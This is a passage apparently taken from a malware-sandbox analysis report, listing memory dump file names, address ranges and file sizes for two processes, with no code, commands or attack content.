                                                                                                                                                                                                                                              • memory/4880-642-0x00007FFE40330000-0x00007FFE404A3000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.4MB

                                                                                                                                                                                                                                              • memory/4880-641-0x00007FFE4C8A0000-0x00007FFE4C8C3000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                140KB

                                                                                                                                                                                                                                              • memory/4880-640-0x00007FFE4C8F0000-0x00007FFE4C909000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                100KB

                                                                                                                                                                                                                                              • memory/4880-639-0x00007FFE4D370000-0x00007FFE4D39D000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                180KB

                                                                                                                                                                                                                                              • memory/4880-638-0x00007FFE51610000-0x00007FFE5161F000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                60KB

                                                                                                                                                                                                                                              • memory/4880-637-0x00007FFE529D0000-0x00007FFE529F4000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                144KB

                                                                                                                                                                                                                                              • memory/4880-636-0x00007FFE404B0000-0x00007FFE40A98000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                5.9MB

                                                                                                                                                                                                                                              • memory/4880-333-0x00007FFE41FD0000-0x00007FFE41FE4000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                80KB

                                                                                                                                                                                                                                              • memory/4880-335-0x00007FFE4D740000-0x00007FFE4D74D000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                52KB

                                                                                                                                                                                                                                              • memory/4880-332-0x00007FFE51610000-0x00007FFE5161F000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                60KB

                                                                                                                                                                                                                                              • memory/4880-331-0x00007FFE529D0000-0x00007FFE529F4000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                144KB

                                                                                                                                                                                                                                              • memory/4880-328-0x00007FFE404B0000-0x00007FFE40A98000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                5.9MB

                                                                                                                                                                                                                                              • memory/4880-329-0x00007FFE40270000-0x00007FFE40328000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                736KB

                                                                                                                                                                                                                                              • memory/4880-327-0x00007FFE43B30000-0x00007FFE43B5E000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                184KB

                                                                                                                                                                                                                                              • memory/4880-326-0x00007FFE4DF30000-0x00007FFE4DF3D000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                52KB

                                                                                                                                                                                                                                              • memory/4880-325-0x00007FFE49320000-0x00007FFE49339000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                100KB

                                                                                                                                                                                                                                              • memory/4880-324-0x00007FFE40330000-0x00007FFE404A3000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.4MB

                                                                                                                                                                                                                                              • memory/4880-323-0x00007FFE4C8A0000-0x00007FFE4C8C3000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                140KB

                                                                                                                                                                                                                                              • memory/4880-322-0x00007FFE4C8F0000-0x00007FFE4C909000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                100KB

                                                                                                                                                                                                                                              • memory/4880-321-0x00007FFE4D370000-0x00007FFE4D39D000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                180KB

                                                                                                                                                                                                                                              • memory/4880-316-0x00007FFE51610000-0x00007FFE5161F000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                60KB

                                                                                                                                                                                                                                              • memory/4880-315-0x00007FFE529D0000-0x00007FFE529F4000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                144KB

                                                                                                                                                                                                                                              • memory/4880-314-0x00007FFE404B0000-0x00007FFE40A98000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                5.9MB

                                                                                                                                                                                                                                              • memory/4932-175-0x0000000061B00000-0x0000000061BA9000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                676KB

                                                                                                                                                                                                                                              • memory/4932-141-0x0000000061B00000-0x0000000061BA9000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                676KB